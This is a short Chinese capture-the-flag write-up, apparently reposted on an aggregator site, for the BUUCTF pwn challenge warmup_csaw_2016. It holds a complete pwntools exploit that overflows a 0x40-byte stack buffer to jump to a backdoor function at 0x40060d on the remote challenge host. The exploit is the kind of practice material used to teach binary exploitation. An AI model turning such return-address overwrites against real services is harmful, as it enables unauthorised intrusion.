【BUUCTF - PWN】warmup_csaw_2016

其他 2020-04-13 21:27:19 阅读次数: 0

checksec一下，发现啥保护也没开

IDA打开看看，又是明显的栈溢出漏洞，看到v5的长度为0x40、后门函数的地址为0x40060d

from pwn import *
from LibcSearcher import *

context.os='linux'
context.arch='amd64'
context.log_level='debug'

sl=lambda x:io.sendline(x)

io=remote('node3.buuoj.cn',29040)

payload='a'*(0x40+8)+p64(0x40060d)
sl(payload)

io.interactive()

附件：warmup_csaw_2016

古月浪子

发布了30 篇原创文章 · 获赞 9 · 访问量 7382

私信关注

猜你喜欢

转载自blog.csdn.net/tqydyqt/article/details/104972433

【BUUCTF - PWN】warmup_csaw_2016

warmup_csaw_2016

buuctf warmup

CSAW CTF 2016 PWN quals-warmup

【BUUCTF - PWN】pwn1_sctf_2016

BUUCTF [HCTF 2018] WarmUp

buuctf@pwn1_sctf_2016

【BUUCTF - PWN】not_the_same_3dsctf_2016

BUUCTF-pwn2_sctf_2016

BUUCTF(pwn)not_the_same_3dsctf_2016

【BUUCTF - PWN】rip

【BUUCTF - PWN】babyrop

buuctf-pwn babyrop

BUUCTF(Pwn) rip

buuctf pwn （21~24）

buuctf pwn （17~20）

buuctf pwn（13~16）

buuctf pwn（9~12）

buuctf pwn（5~8）

buuctf pwn（1~4）

BUUCTF-[HCTF 2018]WarmUp

buuctf web [HCTF 2018]WarmUp

[BUUCTF-pwn]——pwn1_sctf_2016

【BUUCTF - PWN】PWN5

BUUCTF PWN部分题目wp

buuctf --pwn part2

【BUUCTF - PWN】baby_rop

BUUCTF-PWN-cmcc_simplerop

[BUUCTF]PWN——jarvisoj_fm

BUUCTF bbys_tu_2016&&xm_2019_awd_pwn2

今日推荐

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

国产云输入法——仅华为无云端数据上传安全问题

开源日报 | 工业开源项目OGG 1.0；姐姐，你要和我一起配置火狐吗；苹果AI遥遥落后？Fedora 40

开放签电子签章：停止新增，优化体验，前进更进（五一假期前工作）

开源日报 | 中学生开源前端动画引擎；全球首个Llama3 8B中文版开源模型；联想电脑恐出局；Linus讽刺AI炒作

“百模大战”必有一战 | 2024中国“百模大战”竞争格局分析

周排行

Family Tree 题解

BZOJ 1093 最大半连通子图 SCC + DP

幂等处理

Spring----学习（2）----XML 配置Bean 自动装配

SQL Server 远程更新目标表数据

HIbernate3.6 环境搭建

特殊符号正则表达式

【Linux】第一章进程的理解

843. n-皇后问题（dfs+输出各种情况）

空间数据库2

每日归档

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)

2024-04-18(0)

2024-04-17(5)